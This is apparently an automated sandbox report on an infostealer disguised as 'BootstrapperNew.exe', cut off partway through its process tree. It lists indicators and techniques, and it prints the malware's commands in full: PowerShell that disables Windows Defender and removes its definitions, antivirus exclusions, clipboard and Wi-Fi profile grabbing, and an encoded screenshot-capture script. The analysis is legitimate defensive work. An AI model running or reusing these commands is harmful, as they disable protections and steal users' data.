Analysis
-
max time kernel
100s -
max time network
129s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
21-02-2025 13:02
Behavioral task
behavioral1
Sample
BootstrapperNew.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
BootstrapperNew.exe
Resource
win10v2004-20250217-en
General
-
Target
BootstrapperNew.exe
-
Size
10.1MB
-
MD5
8a17fb8a9d607218a28ee23b71112c5a
-
SHA1
740e52b663319b6a2569da176412c35945ea98a2
-
SHA256
b6c526ae5a34beea99552677de36501cc83837543692ee4e4b137882cf3d0fe8
-
SHA512
f11595b9bfc568951fba250876d5be8054fd5975c037e38f3b1aa440931c55ede50f834e05499521d8b086ead6150353948f4e0311fdf1969592408640e28187
-
SSDEEP
196608:vWc06QhqYMYYBKpYDXcbwO/ikbwfI9jUCD6rlaZLH7qRGrGIYUoZy8FUsOnAou:IqEHOXcb1inIH20drLYRZjou
Malware Config
Signatures
-
pid Process 4548 powershell.exe 1860 powershell.exe 5924 powershell.exe 5936 powershell.exe 4540 powershell.exe 1856 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts BootstrapperNew.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 5852 cmd.exe 4668 powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 2628 bound.exe 2156 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 4784 BootstrapperNew.exe 4784 BootstrapperNew.exe 4784 BootstrapperNew.exe 4784 BootstrapperNew.exe 4784 BootstrapperNew.exe 4784 BootstrapperNew.exe 4784 BootstrapperNew.exe 4784 BootstrapperNew.exe 4784 BootstrapperNew.exe 4784 BootstrapperNew.exe 4784 BootstrapperNew.exe 4784 BootstrapperNew.exe 4784 BootstrapperNew.exe 4784 BootstrapperNew.exe 4784 BootstrapperNew.exe 4784 BootstrapperNew.exe 4784 BootstrapperNew.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 21 discord.com 19 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 17 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 5156 tasklist.exe 4212 tasklist.exe 1736 tasklist.exe 5708 tasklist.exe -
resource yara_rule behavioral2/files/0x0008000000023cf5-22.dat upx behavioral2/memory/4784-26-0x00007FFC203E0000-0x00007FFC20A44000-memory.dmp upx behavioral2/files/0x000b000000023bf6-28.dat upx behavioral2/files/0x0008000000023cf3-32.dat upx behavioral2/memory/4784-50-0x00007FFC34E40000-0x00007FFC34E4F000-memory.dmp upx behavioral2/files/0x0008000000023cd7-49.dat upx behavioral2/files/0x0008000000023cd6-48.dat upx behavioral2/files/0x0008000000023cd1-47.dat upx behavioral2/files/0x0008000000023cd0-46.dat upx behavioral2/files/0x0009000000023ccd-45.dat upx behavioral2/files/0x000b000000023bfa-44.dat upx behavioral2/files/0x000b000000023bf9-43.dat upx behavioral2/files/0x000b000000023bd0-42.dat upx behavioral2/files/0x0008000000023d21-41.dat upx behavioral2/files/0x0008000000023d15-40.dat upx behavioral2/files/0x0008000000023d11-39.dat upx behavioral2/files/0x0008000000023cf4-36.dat upx behavioral2/files/0x0008000000023cf2-35.dat upx behavioral2/memory/4784-31-0x00007FFC34F00000-0x00007FFC34F27000-memory.dmp upx behavioral2/memory/4784-54-0x00007FFC2FCE0000-0x00007FFC2FD0B000-memory.dmp upx behavioral2/memory/4784-53-0x00007FFC2FD10000-0x00007FFC2FD29000-memory.dmp upx behavioral2/memory/4784-60-0x00007FFC2FCB0000-0x00007FFC2FCD5000-memory.dmp upx behavioral2/memory/4784-62-0x00007FFC20260000-0x00007FFC203DF000-memory.dmp upx behavioral2/memory/4784-66-0x00007FFC34E30000-0x00007FFC34E3D000-memory.dmp upx behavioral2/memory/4784-65-0x00007FFC2FBF0000-0x00007FFC2FC09000-memory.dmp upx behavioral2/memory/4784-75-0x00007FFC20190000-0x00007FFC2025E000-memory.dmp upx behavioral2/memory/4784-74-0x00007FFC1FC50000-0x00007FFC20183000-memory.dmp upx behavioral2/memory/4784-72-0x00007FFC2FBB0000-0x00007FFC2FBE3000-memory.dmp upx behavioral2/memory/4784-71-0x00007FFC203E0000-0x00007FFC20A44000-memory.dmp upx behavioral2/memory/4784-76-0x00007FFC34F00000-0x00007FFC34F27000-memory.dmp upx behavioral2/memory/4784-78-0x00007FFC2FB90000-0x00007FFC2FBA4000-memory.dmp upx behavioral2/memory/4784-80-0x00007FFC33660000-0x00007FFC3366D000-memory.dmp upx behavioral2/memory/4784-86-0x00007FFC2F950000-0x00007FFC2FA03000-memory.dmp upx behavioral2/memory/4784-87-0x00007FFC2FCB0000-0x00007FFC2FCD5000-memory.dmp upx behavioral2/memory/4784-155-0x00007FFC20260000-0x00007FFC203DF000-memory.dmp upx behavioral2/memory/4784-243-0x00007FFC2FBB0000-0x00007FFC2FBE3000-memory.dmp upx behavioral2/memory/4784-245-0x00007FFC1FC50000-0x00007FFC20183000-memory.dmp upx behavioral2/memory/4784-252-0x00007FFC20190000-0x00007FFC2025E000-memory.dmp upx behavioral2/memory/4784-336-0x00007FFC2FB90000-0x00007FFC2FBA4000-memory.dmp upx behavioral2/memory/4784-320-0x00007FFC203E0000-0x00007FFC20A44000-memory.dmp upx behavioral2/memory/4784-327-0x00007FFC20260000-0x00007FFC203DF000-memory.dmp upx behavioral2/memory/4784-365-0x00007FFC203E0000-0x00007FFC20A44000-memory.dmp upx behavioral2/memory/4784-379-0x00007FFC2F950000-0x00007FFC2FA03000-memory.dmp upx behavioral2/memory/4784-378-0x00007FFC33660000-0x00007FFC3366D000-memory.dmp upx behavioral2/memory/4784-377-0x00007FFC2FB90000-0x00007FFC2FBA4000-memory.dmp upx behavioral2/memory/4784-389-0x00007FFC2FBB0000-0x00007FFC2FBE3000-memory.dmp upx behavioral2/memory/4784-390-0x00007FFC1FC50000-0x00007FFC20183000-memory.dmp upx behavioral2/memory/4784-388-0x00007FFC20190000-0x00007FFC2025E000-memory.dmp upx behavioral2/memory/4784-387-0x00007FFC2FBF0000-0x00007FFC2FC09000-memory.dmp upx behavioral2/memory/4784-386-0x00007FFC20260000-0x00007FFC203DF000-memory.dmp upx behavioral2/memory/4784-385-0x00007FFC2FCB0000-0x00007FFC2FCD5000-memory.dmp upx behavioral2/memory/4784-384-0x00007FFC2FCE0000-0x00007FFC2FD0B000-memory.dmp upx behavioral2/memory/4784-383-0x00007FFC2FD10000-0x00007FFC2FD29000-memory.dmp upx behavioral2/memory/4784-382-0x00007FFC34E40000-0x00007FFC34E4F000-memory.dmp upx behavioral2/memory/4784-381-0x00007FFC34F00000-0x00007FFC34F27000-memory.dmp upx behavioral2/memory/4784-380-0x00007FFC34E30000-0x00007FFC34E3D000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 2928 cmd.exe 2244 netsh.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2200 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 1904 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 27 IoCs
pid Process 5936 powershell.exe 5936 powershell.exe 5936 powershell.exe 1856 powershell.exe 1856 powershell.exe 4548 powershell.exe 4548 powershell.exe 4548 powershell.exe 4540 powershell.exe 4540 powershell.exe 1856 powershell.exe 4668 powershell.exe 4668 powershell.exe 1884 powershell.exe 1884 powershell.exe 4668 powershell.exe 4540 powershell.exe 1884 powershell.exe 1860 powershell.exe 1860 powershell.exe 1860 powershell.exe 2244 powershell.exe 2244 powershell.exe 5924 powershell.exe 5924 powershell.exe 924 powershell.exe 924 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5936 powershell.exe Token: SeDebugPrivilege 4212 tasklist.exe Token: SeDebugPrivilege 4548 powershell.exe Token: SeDebugPrivilege 5156 tasklist.exe Token: SeDebugPrivilege 1856 powershell.exe Token: SeIncreaseQuotaPrivilege 2572 WMIC.exe Token: SeSecurityPrivilege 2572 WMIC.exe Token: SeTakeOwnershipPrivilege 2572 WMIC.exe Token: SeLoadDriverPrivilege 2572 WMIC.exe Token: SeSystemProfilePrivilege 2572 WMIC.exe Token: SeSystemtimePrivilege 2572 WMIC.exe Token: SeProfSingleProcessPrivilege 2572 WMIC.exe Token: SeIncBasePriorityPrivilege 2572 WMIC.exe Token: SeCreatePagefilePrivilege 2572 WMIC.exe Token: SeBackupPrivilege 2572 WMIC.exe Token: SeRestorePrivilege 2572 WMIC.exe Token: SeShutdownPrivilege 2572 WMIC.exe Token: SeDebugPrivilege 2572 WMIC.exe Token: SeSystemEnvironmentPrivilege 2572 WMIC.exe Token: SeRemoteShutdownPrivilege 2572 WMIC.exe Token: SeUndockPrivilege 2572 WMIC.exe Token: SeManageVolumePrivilege 2572 WMIC.exe Token: 33 2572 WMIC.exe Token: 34 2572 WMIC.exe Token: 35 2572 WMIC.exe Token: 36 2572 WMIC.exe Token: SeDebugPrivilege 1736 tasklist.exe Token: SeDebugPrivilege 4540 powershell.exe Token: SeDebugPrivilege 4668 powershell.exe Token: SeIncreaseQuotaPrivilege 2572 WMIC.exe Token: SeSecurityPrivilege 2572 WMIC.exe Token: SeTakeOwnershipPrivilege 2572 WMIC.exe Token: SeLoadDriverPrivilege 2572 WMIC.exe Token: SeSystemProfilePrivilege 2572 WMIC.exe Token: SeSystemtimePrivilege 2572 WMIC.exe Token: SeProfSingleProcessPrivilege 2572 WMIC.exe Token: SeIncBasePriorityPrivilege 2572 WMIC.exe Token: SeCreatePagefilePrivilege 2572 WMIC.exe Token: SeBackupPrivilege 2572 WMIC.exe Token: SeRestorePrivilege 2572 WMIC.exe Token: SeShutdownPrivilege 2572 WMIC.exe Token: SeDebugPrivilege 2572 WMIC.exe Token: SeSystemEnvironmentPrivilege 2572 WMIC.exe Token: SeRemoteShutdownPrivilege 2572 WMIC.exe Token: SeUndockPrivilege 2572 WMIC.exe Token: SeManageVolumePrivilege 2572 WMIC.exe Token: 33 2572 WMIC.exe Token: 34 2572 WMIC.exe Token: 35 2572 WMIC.exe Token: 36 2572 WMIC.exe Token: SeDebugPrivilege 1884 powershell.exe Token: SeDebugPrivilege 5708 tasklist.exe Token: SeDebugPrivilege 1860 powershell.exe Token: SeDebugPrivilege 2244 powershell.exe Token: SeIncreaseQuotaPrivilege 4020 WMIC.exe Token: SeSecurityPrivilege 4020 WMIC.exe Token: SeTakeOwnershipPrivilege 4020 WMIC.exe Token: SeLoadDriverPrivilege 4020 WMIC.exe Token: SeSystemProfilePrivilege 4020 WMIC.exe Token: SeSystemtimePrivilege 4020 WMIC.exe Token: SeProfSingleProcessPrivilege 4020 WMIC.exe Token: SeIncBasePriorityPrivilege 4020 WMIC.exe Token: SeCreatePagefilePrivilege 4020 WMIC.exe Token: SeBackupPrivilege 4020 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3952 wrote to memory of 4784 3952 BootstrapperNew.exe 87 PID 3952 wrote to memory of 4784 3952 BootstrapperNew.exe 87 PID 4784 wrote to memory of 1392 4784 BootstrapperNew.exe 89 PID 4784 wrote to memory of 1392 4784 BootstrapperNew.exe 89 PID 4784 wrote to memory of 3300 4784 BootstrapperNew.exe 90 PID 4784 wrote to memory of 3300 4784 BootstrapperNew.exe 90 PID 4784 wrote to memory of 3016 4784 BootstrapperNew.exe 93 PID 4784 wrote to memory of 3016 4784 BootstrapperNew.exe 93 PID 4784 wrote to memory of 4568 4784 BootstrapperNew.exe 94 PID 4784 wrote to memory of 4568 4784 BootstrapperNew.exe 94 PID 4784 wrote to memory of 5656 4784 BootstrapperNew.exe 95 PID 4784 wrote to memory of 5656 4784 BootstrapperNew.exe 95 PID 1392 wrote to memory of 5936 1392 cmd.exe 99 PID 1392 wrote to memory of 5936 1392 cmd.exe 99 PID 4568 wrote to memory of 2628 4568 cmd.exe 100 PID 4568 wrote to memory of 2628 4568 cmd.exe 100 PID 4784 wrote to memory of 5404 4784 BootstrapperNew.exe 101 PID 4784 wrote to memory of 5404 4784 BootstrapperNew.exe 101 PID 4784 wrote to memory of 3696 4784 BootstrapperNew.exe 102 PID 4784 wrote to memory of 3696 4784 BootstrapperNew.exe 102 PID 4784 wrote to memory of 3328 4784 BootstrapperNew.exe 105 PID 4784 wrote to memory of 3328 4784 BootstrapperNew.exe 105 PID 4784 wrote to memory of 5852 4784 BootstrapperNew.exe 106 PID 4784 wrote to memory of 5852 4784 BootstrapperNew.exe 106 PID 4784 wrote to memory of 2220 4784 BootstrapperNew.exe 108 PID 4784 wrote to memory of 2220 4784 BootstrapperNew.exe 108 PID 3300 wrote to memory of 4548 3300 cmd.exe 109 PID 3300 wrote to memory of 4548 3300 cmd.exe 109 PID 4784 wrote to memory of 3904 4784 BootstrapperNew.exe 112 PID 4784 wrote to memory of 3904 4784 BootstrapperNew.exe 112 PID 3016 wrote to memory of 1856 3016 cmd.exe 113 PID 3016 wrote to memory of 1856 3016 cmd.exe 113 PID 4784 wrote to memory of 2928 4784 BootstrapperNew.exe 114 PID 4784 wrote to memory of 2928 4784 BootstrapperNew.exe 114 PID 5404 wrote to memory of 4212 5404 cmd.exe 115 PID 5404 wrote to memory of 4212 5404 cmd.exe 115 PID 4784 wrote to memory of 3356 4784 BootstrapperNew.exe 117 PID 4784 wrote to memory of 3356 4784 BootstrapperNew.exe 117 PID 4784 wrote to memory of 1900 4784 BootstrapperNew.exe 119 PID 4784 wrote to memory of 1900 4784 BootstrapperNew.exe 119 PID 4784 wrote to memory of 2104 4784 BootstrapperNew.exe 121 PID 4784 wrote to memory of 2104 4784 BootstrapperNew.exe 121 PID 5656 wrote to memory of 4540 5656 cmd.exe 124 PID 5656 wrote to memory of 4540 5656 cmd.exe 124 PID 3696 wrote to memory of 5156 3696 cmd.exe 125 PID 3696 wrote to memory of 5156 3696 cmd.exe 125 PID 2220 wrote to memory of 1736 2220 cmd.exe 126 PID 2220 wrote to memory of 1736 2220 cmd.exe 126 PID 3328 wrote to memory of 2572 3328 cmd.exe 127 PID 3328 wrote to memory of 2572 3328 cmd.exe 127 PID 5852 wrote to memory of 4668 5852 cmd.exe 128 PID 5852 wrote to memory of 4668 5852 cmd.exe 128 PID 3356 wrote to memory of 1904 3356 cmd.exe 130 PID 3356 wrote to memory of 1904 3356 cmd.exe 130 PID 3904 wrote to memory of 4956 3904 cmd.exe 132 PID 3904 wrote to memory of 4956 3904 cmd.exe 132 PID 2928 wrote to memory of 2244 2928 cmd.exe 170 PID 2928 wrote to memory of 2244 2928 cmd.exe 170 PID 2104 wrote to memory of 1884 2104 cmd.exe 133 PID 2104 wrote to memory of 1884 2104 cmd.exe 133 PID 1900 wrote to memory of 1500 1900 cmd.exe 134 PID 1900 wrote to memory of 1500 1900 cmd.exe 134 PID 4784 wrote to memory of 3920 4784 BootstrapperNew.exe 135 PID 4784 wrote to memory of 3920 4784 BootstrapperNew.exe 135 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 5644 attrib.exe 3252 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3952 -
C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4784 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:1392 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5936
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:3300 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4548
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1856
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "start bound.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4568 -
C:\Users\Admin\AppData\Local\Temp\bound.exebound.exe4⤵
- Executes dropped EXE
PID:2628
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:5656 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4540
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:5404 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4212
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3696 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5156
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:3328 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2572
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:5852 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4668
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1736
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:3904 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:4956
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:2928 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2244
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:3356 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:1904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵
- Suspicious use of WriteProcessMemory
PID:1900 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:1500
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵
- Suspicious use of WriteProcessMemory
PID:2104 -
